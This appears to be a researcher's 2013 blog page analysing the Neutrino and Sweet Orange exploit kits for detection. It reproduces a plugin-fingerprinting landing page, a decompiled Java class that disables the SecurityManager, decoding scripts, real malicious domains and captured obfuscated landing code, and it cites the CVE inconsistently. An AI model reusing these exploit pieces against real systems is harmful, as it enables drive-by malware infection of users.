Sunday, March 31, 2013

Neutrino Exploit Kit landing page demystified


I finally got the time to look into the landing pane of Neutrino. Thanks to @malwaresigs and @kafeine for providing samples :)

What is this shiny new EK up to when it comes to the landing. I have only seen clear text versions so no deobfuscation needed.

Look here for a deeper analysis of "Neutrin Exploit Kit Analysis"

1. The landing


<!DOCTYPE HTML>
<html>
<head>
 <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.9.1/jquery.min.js"></script> 
 <script type="text/javascript" src="scripts/js/plugin_detector.js"></script>
 <script type="text/javascript">
  $(document).ready(function() {
   qweqwewqe('515245e3aaa2cbaa2a00002b');
  });

  function qweqwewqe(hid) {
   var info = {
    plugins : {
     java: plg_all_vers('Java'),
     adobe_reader: plg_ver('AdobeReader'),
     flash: plg_ver('Flash'),
     quick_time: plg_ver('QuickTime'),
     real_player: plg_ver('RealPlayer'),
     shockwave: plg_ver('Shockwave'),
     silver_light: plg_ver('Silverlight'),
     vlc: plg_ver('VLC'),
     wmp: plg_ver('WMP')
    }
   }
      
   var pass = rnd_str(1+Math.floor(Math.random()*10));
   var obj = {};
   obj["h"+rnd_str(1+Math.floor(Math.random()*10))] = hid;      // host id
   obj["p"+rnd_str(1+Math.floor(Math.random()*10))] = pass;     // XOR pass
   obj["i"+rnd_str(1+Math.floor(Math.random()*10))] = kor(JSON.stringify(info), pass);
   
   $("body").load("c"+rnd_str(1+Math.floor(Math.random()*10)), obj);  
  }

  function plg_all_vers(name) {
   var info = PluginDetect.getInfo(name);
   var vers = info.All_versions;
   if(!vers)
    return '';
   return info.All_versions.join(';')
  }

  function plg_ver(name) {
   var info = PluginDetect.getVersion(name);
   return info;
  }
  
  function rnd_str(len) {
   len++;
   var result = [];
   var chars = 'abcdefghijklmnopqrstuvwxyz0123456789';
   while (--len) {
    result.push(chars.charAt(Math.floor(Math.random() * chars.length)));
   }
   return result.join('');
  }


  
  function kor(input, pass) {
   var output = "";
   var i = 0;
   var pos = 0;
   for (i = 0; i < input.length; i++){ 
     pos = Math.floor(i%pass.length);
     output += String.fromCharCode(input.charCodeAt(i) ^ pass.charCodeAt(pos));
   }
   return output;
  }

  JSON.stringify = JSON.stringify || function (obj) {
   var t = typeof (obj);
   if (t != "object" || obj === null) {
    // simple data type
    if (t == "string") obj = '"'+obj+'"';
    return String(obj);
   }
   else {
    // recurse array or object
    var n, v, json = [], arr = (obj && obj.constructor == Array);
    for (n in obj) {
     v = obj[n]; t = typeof(v);
     if (t == "string") v = '"'+v+'"';
     else if (t == "object" && v !== null) v = JSON.stringify(v);
     json.push((arr ? "" : '"' + n + '":') + String(v));
    }
    return (arr ? "[" : "{") + String(json) + (arr ? "]" : "}");
   }
  };


 </script> 
</head>
<body>
</body>
</html>

The Javascript is calling the function  qweqwewqe with som id(comment from the script syas host id), which we can see will be used to fetch JARs and the final payload. Link to @malwaresigs


Plugin detect is used to get the plugins from the client.

Variables are built:

//xor password generation:
 var pass = rnd_str(1+Math.floor(Math.random()*10));
 //@malforsec random string [a-z0-9]{1,10} 
//host id assigned:
 obj["h"+rnd_str(1+Math.floor(Math.random()*10))] = hid;                                  // host id 
 //@malforsec h +  [a-z0-9]{1,10}  = 515245e3aaa2cbaa2a00002b
//xor password assigned:
obj["p"+rnd_str(1+Math.floor(Math.random()*10))] = pass;                                 // XOR pass 
 //@malforsec p +  [a-z0-9]{1,10} = [a-z0-9]{1,10}
//plugin results xored; tostring and assigned:
obj["i"+rnd_str(1+Math.floor(Math.random()*10))] = kor(JSON.stringify(info), pass);
        // @malforsec i + [a-z0-9]{1,10} = XOR info with pass
//jquery to build the post:
 $("body").load("c"+rnd_str(1+Math.floor(Math.random()*10)), obj);              
        //@malforsec   c + [a-z0-9]{1,10},  obj


2. Debugger output

Browser plugin detection


Plugin detection string with XOR key and XORED PD string


Post request built


3. Wireshark output

POST request from captured with wireshark


4. Signatures

These patterns may vary or have changed - look here

POST request to /c[a-z0-9]{1,10}
Content-type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
h[a-z0-9]{1,10}=[a-f0-9]{24}
i[a-z0-9]{1,10}=.*
p[a-z0-9]{1,10}=[a-z0-9]{1,10}$
That should close it in pretty good :)

In addition we got som tip on how to get the different payloads out of the kit if we need to do that some day :)

Happy detecting Neutrino EK POST landing  

Tuesday, March 26, 2013

Making Orange JAM - analyzing Sweet Orange EK Java Archive files


After serving fresh orange juice the other day(Sweet orange EK analysis), grabbing all the evil files off the Sweet Orange exploit kit. We are now sitting here with piles of squeezed orange leftovers. What better idea than to go all the way and make some jam of the leftovers.

To the task of understanding, deobfuscating and reversing Sweet Orange EK JARs. I'm still working on my Python skills so I will throw in some Python code to learn. And my Java FU is not getting better so handling that code is not the way to understand what these bad guys are up to.

But lets see if we can figure out what theyre are up to this time. (see the link above if you need to look into how to pull the archives from the kit).

1. Pull the archive in jd-gui




Lots of strangly named class files. Note that YDXIOXz.bmbf is not even a class. We have located the Class with the applet where the execution starts, just have to look in the Init() method to see what fun stuff is done here

2. Init()


Not much; just instantiatin of QcVEtjNkP

3. Moving on


Finally something is happening: Reading that resource we noted right out of the archive YDXIOXz.bmbf. Creates the Class and moves on to instantiate the class.


Here is is the trick to execute priveleged: CVE-2013-0442; in more detail here 


The URL strings are manipulated this way


Here they build the URL to the exe payload they will fetch. Writing the file to java.io.tmpdir and setting it up be registered as a service and executed.


Finally here is how they manipulate the exe payload before they write it to disk.

4. Overview


So we have covered the basic outline of what the applet wants to do: read(probably a obfuscated class) from the archive, use the vulnerability in com.sun.jmx.mbeanserver.MBeanInstantiator to be able to load classes in previledged mode, invoke the YDXIOXz.bmbf mystery class and then fetch some eviel code and run that on some poor innocent guys computer.

5. Deobfuscation

To bring in some fun into this task, lets see if we can create some Python code to deobfuscate and decrypt their bad code.

5a. Lets look into the mystery resource

First thing first; read the file and replace the SPAM. Fortunately, as in opposite to Mony Python movies, we are allowed to remove the SPAM from these dishes. Whatch on youtube


String str = nkkPPUO(QcVEtjNkP.class.getResourceAsStream("YDXIOXz.bmbf")).replace("^@@#[^]^###", "");

Start of original file: Definately ^@@#[^]^### SPAM in there
CA^@@#[^]^###FE^@@#[^]^###BA^@@#[^]^###BE^@@#[^]^###00^@@#[^]^###00^@@#[^]^###00^@@#[^]^###31^@@#[^]^###00^@@#[^]^###59^@@#[^]^###0A^@@#
[^]^###00^@@#[^]^###11^@@#[^]^###00^@@#[^]^###20^@@#[^]^###0A^@@#[^]^###00^@@#[^]^###21^@@#[^]^###00^@@#[^]^###22^@@#[^]^###07^@@#[^]^##
#00^@@#[^]^###23^@@#[^]^###0A^@@#[^]^###00^@@#[^]^###24^@@#[^]^###00^@@#[^]^###25^@@#[^]^###09^@@#[^]^###00^@@#[^]^###0D^@@#[^]^###00^@@
#[^]^###26^@@#[^]^###08^@@#[^]^###00^@@#[^]^###27^@@#[^]^###0A^@@#[^]^###00^@@#[^]^###28^@@#[^]^###00^@@#[^]^###29^@@#[^]^###09^@@#[^]^#
##00^@@#[^]^###2A^@@#[^]^###00^@@#[^]^###2B^@@#[^]^###07^@@#[^]^###00^@@#[^]^###2C^@@#[^]^###07^@@#[^]^###00^@@#[^]^###2D^@@#[^]^###0A^@
@#[^]^###00^@@#[^]^###2E^@@#[^]^###00^@@#[^]^###2F^@@#[^]^###07^@@#[^]^###00^@@#[^]^###30^@@#[^]^###07^@@#[^]^###00^@@#[^]^###33^@@#[^]^
###08^@@#[^]^###00^@@#[^]^###34^@@#[^]^###0A^@@#[^]^###00^@@#[^]^###0C^@@#[^]^###00^@@#[^]^###35^@@#[^]^###08^@@#[^]^###00^@@#[^]^###36^
@@#[^]^###07^@@#[^]^###00^@@#[^]^###37^@@#[^]^###0A^@@#[^]^###00^@@#[^]^###3

After SPAM reduction; simple replace:
CAFEBABE0000003100590A001100200A002100220700230A0024002509000D00260800270A0028002909002A002B07002C07002D0A002E002F0700300700330800340A000C00350800360700370A003800390A0016003A07003B0A003C003D07003E07003F0100063C696E69743E010003282956010004436F646501000743616C6C53656301001E284C6A6176612F6C616E672F53656375726974794D616E616765723B295601000A457863657074696F6E7301000372756E01001428294C6A6176612F6C616E672F4F626A6563743B0C001800190700400C004100420100136A6176612F6C616E672F457863657074696F6E0700430C004400450C0046004701000C7364667364667364667364660700480C0049004A07004B0C004C004D01000F6A6176612F6C6

Mmmm - SPAM reduction worked and looks like we are looking into a Java Class file which in hex starts with CAFEBABE. Just generate bytecode, disassemble and we have the class to look at(for details on dissasembly look here):

// Decompiled by Jad v1.5.8e. Copyright 2001 Pavel Kouznetsov.
// Jad home page: http://www.geocities.com/kpdus/jad.html
// Decompiler options: packimports(3) 

import java.io.PrintStream;
import java.lang.invoke.*;
import java.security.AccessController;
import java.security.PrivilegedExceptionAction;

public class disabler
    implements PrivilegedExceptionAction
{

    public disabler()
    {
        try
        {
            AccessController.doPrivileged(this);
        }
        catch(Exception exception) { }
    }

    void CallSec(SecurityManager securitymanager)
        throws Throwable
    {
        java.lang.invoke.MethodHandles.Lookup lookup = MethodHandles.publicLookup();
        System.out.println("sdfsdfsdfsdf");
        MethodType methodtype = MethodType.methodType(Void.TYPE, new Class[] {
            java/lang/SecurityManager
        });
        MethodHandle methodhandle = ((java.lang.invoke.MethodHandles.Lookup)lookup).findStatic(java/lang/System, "setSecurityManager", methodtype);
        System.out.println("sdfsdfsdfsdf 5");
        methodhandle.invokeWithArguments(new Object[] {
            null
        });
    }

    public Object run()
    {
        try
        {
            CallSec(null);
        }
        catch(Throwable throwable) { }
        return Integer.valueOf(56);
    }
}
Fun stuff: disabling the Java SecurityManager. Well chosen name disabler :) Kudos for originality. My choice: getRidOfSecurityManagerGoMakeSomeNiceGuysDayMiserable - But what do I know about JAva coding...

Instead I introduce the Python code to do it:

#@malforsec SPAM reduction and Sweet Orange java Bytecode maker
def decodeH(paramString):
  str1 = ""
  for i1 in range(0, (len(paramString)/2), 1):
    str1 += str(chr(int(paramString[(i1*2):((i1*2)+2)], 16)))
  return str1

def main():
  with open('resource.txt', 'r') as f1:
    decoded_class = decodeH(f1.read().replace('^@@#[^]^###', ''))
  with open('new.class', 'w') as fout:
    fout.write(decoded_class)

if __name__ == "__main__":
    main()

5b. The URL to fetch eveil code from the intertubes

Have in mind this is the applet tag variables:

name = "sSpwknEHBp
value = "103sdj115sdj115sdj111sdj57sdj46sdj46sdj101sdj96sdj108sdj104sdj107sdj120sdj115sdj100sdj96sdj111sdj104sdj100sdj56sdj45sdj97sdj104sdj121sdj46sdj116sdj111sdj107sdj110sdj96sdj99sdj114sdj45sdj111sdj103sdj111sdj62sdj99sdj96sdj115sdj96sdj60sdj53sdj55sdj48sdj37sdj107sdj104sdj117sdj100sdj60sdj48sdj47sdj37sdj101sdj113sdj110sdj109sdj115sdj60sdj48sdj50sdj37sdj113sdj100sdj101sdj100sdj113sdj60sdj48sdj55sdj55sdj37sdj104sdj108sdj111sdj113sdj100sdj114sdj114sdj116sdj108sdj60sdj48sdj49sdj53sdj48sdj37sdj114sdj115sdj96sdj115sdj114sdj60sdj49sdj56sdj49sdj37sdj118sdj104sdj109sdj106sdj60sdj51sdj47sdj53sdj37sdj111sdj107sdj116sdj114sdj60sdj51sdj53sdj37sdj101sdj110sdj113sdj108sdj60sdj54sdj50sdj47"
    
name = "TvSRUWW"
value = "68sdj47sdj111sdj64sdj107sdj104sdj56sdj45sdj100sdj119sdj100"
    
name = "SyLIfT"
value =  "108sdj96sdj115sdj103"

Definately more SPAM, spam, spam, spam...

Well lets just make some more Python code to verify what they are up to here; decoding URL + evil save file. I put the strings in there for convenience.


#malforsec  Sweet ORange SPAM reduction, url and save file script
arrayOfString = [
  "103sdj115sdj115sdj111sdj57sdj46sdj46sdj101sdj96sdj108sdj104sdj107sdj120sdj115sdj100sdj96sdj111sdj104sdj100sdj56sdj45sdj97sdj104sdj121sdj46sdj116sdj111sdj107
sdj110sdj96sdj99sdj114sdj45sdj111sdj103sdj111sdj62sdj99sdj96sdj115sdj96sdj60sdj53sdj55sdj48sdj37sdj107sdj104sdj117sdj100sdj60sdj48sdj47sdj37sdj101sdj113sdj110s
dj109sdj115sdj60sdj48sdj50sdj37sdj113sdj100sdj101sdj100sdj113sdj60sdj48sdj55sdj55sdj37sdj104sdj108sdj111sdj113sdj100sdj114sdj114sdj116sdj108sdj60sdj48sdj49sdj5
3sdj48sdj37sdj114sdj115sdj96sdj115sdj114sdj60sdj49sdj56sdj49sdj37sdj118sdj104sdj109sdj106sdj60sdj51sdj47sdj53sdj37sdj111sdj107sdj116sdj114sdj60sdj51sdj53sdj37s
dj101sdj110sdj113sdj108sdj60sdj54sdj50sdj47",
  "68sdj47sdj111sdj64sdj107sdj104sdj56sdj45sdj100sdj119sdj100",
  "108sdj96sdj115sdj103"]

def makeStrOfInt(intArray):
  str1 = ""
  for i in range(0, len(intArray), 1):
    str1 += chr(int(intArray[i]) + 1)
  return str1

def makeURL(p1, p2):
  url = p1+"&"+p2+"="
  return url.replace('http:', 'hxxp: ')

def main():
  print "URL to exe: ",  makeURL(makeStrOfInt(arrayOfString[0].split('sdj')), makeStrOfInt(arrayOfString[2].split('sdj')))
  print 'Save exe: java.io.tmpdir\\', makeStrOfInt(arrayOfString[1].split('sdj')) 
  

if __name__ == "__main__":
    main()

And the output:

$ python so_url_decode.py 
URL to exe:  hxxp: //familyteapie9.biz/uploads.php?data=681&live=10&front=13&refer=188&impressum=1261&stats=292&wink=406&plus=46&form=730&math=
Save exe: java.io.tmpdir\ E0pAli9.exe

Note: There should be a random number between 0-979 at the end of the url. But as you saw in my last post -> probably not needed.

5c. Exe manipulation

As we saw from the code, the evil doers dont just fetch the exe. They throw in some XOR Vodoo, or at least  some XOR code to obfuscate what they are downloading.
Here is an example:



Here is the Java code used to fix it into an exe file(ParamString is the Key):

public static void seRQRYgMP(byte[] paramArrayOfByte, int paramInt, String paramString)
  {
    int i = 0;
    int j = 0;
    int k = 0;
    int m = 0;
    int n = 0;
    int i1 = 0;
    k = paramString.length();
    byte[] arrayOfByte = paramString.getBytes();
    i = 0;
    j = 0;
    while (i < paramInt)
    {
      n = Math.max(1, -932231);
      if (i % Math.max(2, -932231) == 0)
      {
        i1++;
        if (i1 == k)
        {
          i1 = 0;
          n = 0;
        }
      }
      if (paramArrayOfByte[i] == Math.max(0, -932231))
        n = 0;
      if (paramArrayOfByte[i] == arrayOfByte[j])
        n = 0;
      if (n == Math.max(1, -932231))
      {
        m = (byte)(paramArrayOfByte[i] ^ arrayOfByte[j]);
        paramArrayOfByte[i] = m;
      }
      if (j < k - Math.max(1, -932231))
        j++;
      else
        j = 0;
      i++;
    }
  }

  public htispD(OutputStream paramOutputStream, int paramInt)
  {
  }
}

Lets see if we can reproduce it in Python:

#@malforsec Sweet Orange exe deobfuscator
#Key is the parameter from the applet tag from the landing pane
key = "108sdj96sdj115sdj103"

def decodeH(paramString):
  str1 = ""
  for i1 in range(0, (len(paramString)/2), 1):
    str1 += str(chr(int(paramString[(i1*2):((i1*2)+2)], 16)))
  return str1

def makeStrOfInt(intArray):
  str1 = ""
  for i in range(0, len(intArray), 1):
    str1 += chr(int(intArray[i]) + 1)
  return str1

def main():
  keyarr = makeStrOfInt(key.split('sdj'))
  new_str = ""
  with open('so_exe_xored.txt', 'r') as f1:
    inf = f1.read()
    for i in range(0, len(inf), 1):
      if ord(inf[i]) == 0 or ord(inf[i]) == ord(keyarr[i%4]) or i%8 == 6:
        new_str += inf[i]
      else:
        new_str += chr(ord(inf[i]) ^ ord(keyarr[i%4]))
  with open('so_infected.exe', 'w') as fout:
    fout.write(new_str)


if __name__ == "__main__":
    main()

Did we get it right? lets see the start of the exe:

0000000: 4d5a 9000 0300 0000 0400 0000 ffff 0000  MZ..............
0000010: b800 0000 0000 0000 4000 0000 0000 0000  ........@.......
0000020: 0000 0000 0000 0000 0000 0000 0000 0000  ................
0000030: 0000 0000 0000 0000 0000 0000 8000 0000  ................
0000040: 0e1f ba0e 00b4 09cd 21b8 014c cd21 5468  ........!..L.!Th
0000050: 6973 2070 726f 6772 616d 2063 616e 6e6f  is program canno
0000060: 7420 6265 2072 756e 2069 6e20 444f 5320  t be run in DOS 
0000070: 6d6f 6465 2e0d 0d0a 2400 0000 0000 0000  mode....$.......
0000080: 5045 0000 4c01 0400 8554 4c51 0000 0000  PE..L....TLQ....
0000090: 0000 0000 e000 0e01 0b01 0237 0016 0000  ...........7....
00000a0: 004c 0000 0000 0000 1912 0000 0010 0000  .L..............
00000b0: 0030 0000 0000 4000 0010 0000 0002 0000  .0....@.........
00000c0: 0100 0000 0000 0000 0400 0000 0000 0000  ................


Looks perfect to me :)

6. Epilogue

So we have been able to verify that the SO EK is using CVE-2013-0422 as the vector to gain illegal access to others computers. How they obfuscate the code to lure researcher and evade detection mechanisms. We have dissected the code and finally we have not only freshlt sqeezed Sweet Orange juice but we have jam to go with the bread as well.

exe:
MD5: f633b5214319acb48353576d12165d90
VT: 12/46

tarball of the Python code here

Happy Sweet Orange EK deobfuscation

Sunday, March 24, 2013

Squeezing the Orange - Sweet Orange EK analysis


Easter is closing in and what better than to get our self some freshly squeezed oranges on the breakfast table. So lets see if we are lucky enough to have fresh juize or if we have to go to the market and buy some, not so good tasting, canned juize.

1. Fetching the landing pane


--2013-03-23 --  hxxp: //familyteapie1.biz/mail/wap/questions.php?vote=771&london=264&common=537&function=621&oracle=79&entry=721&signin=815
Resolving familyteapie1.biz... 5.199.171.217
Connecting to familyteapie1.biz|5.199.171.217|:80... connected.
HTTP request sent, awaiting response... 
  HTTP/1.1 200 OK
  Date: Sat, 23 Mar 2013 14:15:40 GMT GMT
  Pragma: no-cache
  Server: Apache/2.2.22 (Win32) PHP/5.2.17
  Content-Length: 52084
  Keep-Alive: timeout=5, max=100
  Connection: Keep-Alive
  Content-Type: text/html
Length: 52084 (51K) [text/html]
Saving to: `questions.php'

     0K .......... .......... .......... .......... .......... 98%  251K 0s
    50K                                                       100% 1647G=0.2s

2013-03-23 (255 KB/s) - `questions.php' saved [52084/52084]

Here is what we get:

<html>
<head>
<meta name="keywords" content="rev,vps,se,rus" /><title>Free day</title></head><body><br><table style="width: 100%; height: 100%; border: none" cellspacing="0" cellpadding="0"></table><fieldset  id="AFegplAupm" style="color: rgb(110,179,162);display: none;">
 _494_ _494_ _494_ _494_f_494_u_494_n_494_c_494_t_494_i_494_o_494_n_494_ _494_I_494_s_494_P_494_l_494_u_494_g_494_(_494_)_494_{_494_ _494_ _494_ _494_ _494_v_494_a_494_r_494_ _494_P_494_l_494_u_494_g_494_N_494_a_494_m_494_e_494_ _494_=_494_ _494_"_494_"_494_ _494_;_494_v_494_a_494_r_494_ _494_r_494_e_494_s_494_ _494_=_494_ _494_0_494_;_494_t_494_r_494_y_494_{_494_i_494_f_494_(_494_ _494_n_494_a_494_v_494_i_494_g_494_a_494_t_494_o_494_r_494_._494_p_494_l_494_u_494_g_494_i_494_n_494_s_494_ _494___494___494_j_494_E_494_n_494_7_494___494___494___494___494_j_494_E_494_n_494_7_494___494___494_ _494_n_494_a_494_v_494_i_494_g_494_a_494_t_494_o_494_r_494_._494_m_494_i_494_m_494_e_494_T_494_y_494_p_494_e_494_s_494_._494_l_494_e_494_n_494_g_494_t_494_h_494_)_494_{_494_ _494_ _494_ _494_ _494_f_494_o_494_r_494_(_494_ _494_v_494_a_494_r_494_ _494_i_494_ _494_=_494_ _494_0_494_;_494_ _494_i_494_ _494___494___494_d_494_E_494_n_494_3_494___494___494_ _494_n_494_a_494_v_494_i_494_g_494_a_494_t_494_o_494_r_494_._494_p_494_l_494_u_494_g_494_i_494_n_494_s_494_._494_l_494_e_494_n_494_g_494_t_494_h_494_;_494_ _494_i_494_+_494_+_494_)_494_{_494_j_494_f_494_ _494_=_494_ _494_n_494_a_494_v_494_i_494_g_494_a_494_t_494_o_494_r_494_._494_p_494_l_494_u_494_g_494_i_494_n_494_s_494_[_494_i_494_]_494_._494_n_494_a_494_m_494_e_494_._494_m_494_a_494_t_494_c_494_h_494_(_494_/_494_A_494_d_494_o_494_b_494_e_494_ _494_A_494_c_494_r_494_o_494_b_494_a_494_t_494_/_494_)_494_ _494_;_494_i_494_f_494_ _494_(_494_!_494_j_494_f_494_)_494_ _494_{_494_ _494_ _494_j_494_f_494_ _494_=_494_ _494_n_494_a_494_v_494_i_494_g_494_a_494_t_494_o_494_r_494_._494_p_494_l_494_u_494_g_494_i_494_n_494_s_494_[_494_i_494_]_494_._494_n_494_a_494_m_494_e_494_._494_m_494_a_494_t_494_c_494_h_494_(_494_/_494_A_494_d_494_o_494_b_494_e_494_ _494_P_494_D_494_F_494_/_494_)_494_ _494_;_494_}_494_;_494_i_494_f_494_ _494_(_494_j_494_f_494_)_494_{_494_ _494_ _494_ _494_ _494_r_494_e_494_s_494_ _494_=_494_ _494_1_494_;_494_b_494_r_494_e_494_a_494_k_494_;_494_}_494_;_494_ _494_ _494_ _494_ _494_}_494_;_494_}_494_;_494_ _494_ _494_ _494_ _494_}_494_ _494_ _494_ _494_ _494_c_494_a_494_t_494_c_494_h_494_(_494_e_494_)_494_{_494_}_494_;_494_r_494_e_494_t_494_u_494_r_494_n_494_ _494_r_494_e_494_s_494_;_494_ _494_ _494_ _494_ _494_}_494_;_494_ _494_d_494_o_494_c_494_u_494_m_494_e_494_n_494_t_494_._494_w_494_r_494_i_494_t_494_e_494_(_494_"_494___494___494_d_494_E_494_n_494_3_494___494___494_a_494_p_494_p_494_l_494_e_494_t_494_ _494_ _494_a_494_r_494_c_494_h_494_i_494_v_494_e_494_=_494_\_494_"_494_N_494_W_494_H_494_r_494_h_494_\_494_"_494_ _494_ _494_c_494_o_494_d_494_e_494_=_494_\_494_"_494_o_494_V_494_v_494_._494_c_494_l_494_a_494_s_494_s_494_\_494_"_494_ _494_ _494_w_494_i_494_d_494_t_494_h_494_=_494_\_494_"_494_1_494_0_494_\_494_"_494_ _494_h_494_e_494_i_494_g_494_h_494_t_494_=_494_\_494_"_494_1_494_8_494_\_494_"_494___494___494_F_494_E_494_n_494_8_494___494___494___494___494_d_494_E_494_n_494_3_494___494___494_p_494_a_494_r_494_a_494_m_494_ _494_v_494_a_494_l_494_u_494_e_494_=_494_\_494_"_494_1_494_0_494_3_494_s_494_d_494_j_494_1_494_1_494_5_494_s_494_d_494_j_494_1_494_1_494_5_494_s_494_d_494_j_494_1_494_1_494_1_494_s_494_d_494_j_494_5_494_7_494_s_494_d_494_j_494_4_494_6_494_s_494_d_494_j_494_4_494_6_494_s_494_d_494_j_494_1_494_0_494_1_494_s_494_d_494_j_494_9_494_6_494_s_494_d_494_j_494_1_494_0_494_8_494_s_494_d_494_j_494_1_494_0_494_4_494_s_494_d_494_j_494_1_494_0_494_7_494_s_494_d_494_j_494_1_494_2_494_0_494_s_494_d_494_j_494_1_494_1_494_5_494_s_494_d_494_j_494_1_494_0_494_0_494_s_494_d_494_j_494_9_494_6_494_s_494_d_494_j_494_1_494_1_494_1_494_s_494_d_494_j_494_1_494_0_494_4_494_s_494_d_494_j_494_1_494_0_494_0_494_s_494_d_494_j_494_5_494_6_494_s_494_d_494_j_494_4_494_5_494_s_494_d_494_j_494_9_494_7_494_s_494_d_494_j_494_1_494_0_494_4_494_s_494_d_494_j_494_1_494_2_494_1_494_s_494_d_494_j_494_4_494_6_494_s_494_d_494_j_494_1_494_1_494_6_494_s_494_d_494_j_494_1_494_1_494_1_494_s_494_d_494_j_494_1_494_0_494_7_494_s_494_d_494_j_494_1_494_1_494_0_494_s_494_d_494_j_494_9_494_6_494_s_494_d_494_j_494_9_494_9_494_s_494_d_494_j_494_1_494_1_494_4_494_s_494_d_494_j_494_4_494_5_494_s_494_d_494_j_494_1_494_1_494_1_494_s_494_d_494_j_494_1_494_0_494_3_494_s_494_d_494_j_494_1_494_1_494_1_494_s_494_d_494_j_494_6_494_2_494_s_494_d_494_j_494_1_494_0_494_7_494_s_494_d_494_j_494_1_494_0_494_4_494_s_494_d_494_j_494_1_494_0_494_9_494_s_494_d_494_j_494_1_494_0_494_6_494_s_494_d_494_j_494_1_494_1_494_4_494_s_494_d_494_j_494_6_494_0_494_s_494_d_494_j_494_4_494_9_494_s_494_d_494_j_494_5_494_2_494_s_494_d_494_j_494_5_494_4_494_s_494_d_494_j_494_3_494_7_494_s_494_d_494_j_494_1_494_0_494_1_494_s_494_d_494_j_494_1_494_1_494_3_494_s_494_d_494_j_494_1_494_1_494_0_494_s_494_d_494_j_494_1_494_0_494_9_494_s_494_d_494_j_494_1_494_1_494_5_494_s_494_d_494_j_494_6_494_0_494_s_494_d_494_j_494_4_494_8_494_s_494_d_494_j_494_5_494_0_494_s_494_d_494_j_494_3_494_7_494_s_494_d_494_j_494_1_494_0_494_8_494_s_494_d_494_j_494_1_494_0_494_0_494_s_494_d_494_j_494_1_494_1_494_5_494_s_494_d_494_j_494_9_494_6_494_s_494_d_494_j_494_6_494_0_494_s_494_d_494_j_494_5_494_3_494_s_494_d_494_j_494_5_494_1_494_s_494_d_494_j_494_5_494_6_494_s_494_d_494_j_494_3_494_7_494_s_494_d_494_j_494_1_494_0_494_4_494_s_494_d_494_j_494_1_494_0_494_8_494_s_494_d_494_j_494_1_494_1_494_1_494_s_494_d_494_j_494_1_494_1_494_3_494_s_494_d_494_j_494_1_494_0_494_0_494_s_494_d_494_j_494_1_494_1_494_4_494_s_494_d_494_j_494_1_494_1_494_4_494_s_494_d_494_j_494_1_494_1_494_6_494_s_494_d_494_j_494_1_494_0_494_8_494_s_494_d_494_j_494_6_494_0_494_s_494_d_494_j_494_4_494_8_494_s_494_d_494_j_494_4_494_9_494_s_494_d_494_j_494_5_494_3_494_s_494_d_494_j_494_4_494_8_494_s_494_d_494_j_494_3_494_7_494_s_494_d_494_j_494_1_494_1_494_4_494_s_494_d_494_j_494_9_494_6_494_s_494_d_494_j_494_1_494_0_494_7_494_s_494_d_494_j_494_1_494_0_494_0_494_s_494_d_494_j_494_1_494_1_494_4_494_s_494_d_494_j_494_6_494_0_494_s_494_d_494_j_494_5_494_1_494_s_494_d_494_j_494_5_494_5_494_s_494_d_494_j_494_3_494_7_494_s_494_d_494_j_494_9_494_7_494_s_494_d_494_j_494_1_494_0_494_4_494_s_494_d_494_j_494_1_494_1_494_0_494_s_494_d_494_j_494_1_494_1_494_4_494_s_494_d_494_j_494_6_494_0_494_s_494_d_494_j_494_4_494_9_494_s_494_d_494_j_494_4_494_9_494_s_494_d_494_j_494_5_494_6_494_s_494_d_494_j_494_3_494_7_494_s_494_d_494_j_494_1_494_0_494_2_494_s_494_d_494_j_494_9_494_6_494_s_494_d_494_j_494_1_494_0_494_8_494_s_494_d_494_j_494_1_494_0_494_0_494_s_494_d_494_j_494_6_494_0_494_s_494_d_494_j_494_5_494_1_494_s_494_d_494_j_494_5_494_6_494_s_494_d_494_j_494_3_494_7_494_s_494_d_494_j_494_9_494_8_494_s_494_d_494_j_494_1_494_0_494_7_494_s_494_d_494_j_494_1_494_0_494_4_494_s_494_d_494_j_494_9_494_8_494_s_494_d_494_j_494_1_494_0_494_6_494_s_494_d_494_j_494_6_494_0_494_s_494_d_494_j_494_5_494_0_494_s_494_d_494_j_494_5_494_4_494_s_494_d_494_j_494_3_494_7_494_s_494_d_494_j_494_1_494_1_494_4_494_s_494_d_494_j_494_1_494_0_494_6_494_s_494_d_494_j_494_1_494_0_494_4_494_s_494_d_494_j_494_1_494_0_494_9_494_s_494_d_494_j_494_6_494_0_494_s_494_d_494_j_494_4_494_8_494_s_494_d_494_j_494_5_494_0_494_s_494_d_494_j_494_5_494_2_494_\_494_"_494_ _494_n_494_a_494_m_494_e_494_=_494_\_494_"_494_E_494_O_494_H_494_P_494_i_494_f_494_L_494_\_494_"_494_ _494___494___494_F_494_E_494_n_494_8_494___494___494___494___494_d_494_E_494_n_494_3_494___494___494_p_494_a_494_r_494_a_494_m_494_ _494_v_494_a_494_l_494_u_494_e_494_=_494_\_494_"_494_7_494_1_494_s_494_d_494_j_494_8_494_2_494_s_494_d_494_j_494_1_494_0_494_6_494_s_494_d_494_j_494_6_494_7_494_s_494_d_494_j_494_5_494_3_494_s_494_d_494_j_494_1_494_1_494_2_494_s_494_d_494_j_494_1_494_1_494_3_494_s_494_d_494_j_494_4_494_5_494_s_494_d_494_j_494_1_494_0_494_0_494_s_494_d_494_j_494_1_494_1_494_9_494_s_494_d_494_j_494_1_494_0_494_0_494_\_494_"_494_ _494_n_494_a_494_m_494_e_494_=_494_\_494_"_494_X_494_v_494_r_494_f_494_N_494_M_494_u_494_\_494_"_494_ _494___494___494_F_494_E_494_n_494_8_494___494___494___494___494_d_494_E_494_n_494_3_494___494___494_p_494_a_494_r_494_a_494_m_494_ _494_v_494_a_494_l_494_u_494_e_494_=_494_\_494_"_494_1_494_0_494_8_494_s_494_d_494_j_494_9_494_6_494_s_494_d_494_j_494_1_494_1_494_5_494_s_494_d_494_j_494_1_494_0_494_3_494_\_494_"_494_ _494_n_494_a_494_m_494_e_494_=_494_\_494_"_494_A_494_d_494_b_494_m_494_X_494_f_494_U_494_G_494_g_494_x_494_\_494_"_494_ _494___494___494_F_494_E_494_n_494_8_494___494___494___494___494_d_494_E_494_n_494_3_494___494___494_/_494_a_494_p_494_p_494_l_494_e_494_t_494___494___494_F_494_E_494_n_494_8_494___494___494_"_494_)_494_;_494_ _494_ _494_d_494_o_494_c_494_u_494_m_494_e_494_n_494_t_494_._494_w_494_r_494_i_494_t_494_e_494_(_494_"_494___494___494_d_494_E_494_n_494_3_494___494___494_a_494_p_494_p_494_l_494_e_494_t_494_ _494_ _494_a_494_r_494_c_494_h_494_i_494_v_494_e_494_=_494_\_494_"_494_l_494_n_494_M_494_F_494_T_494_p_494_P_494_w_494_\_494_"_494_ 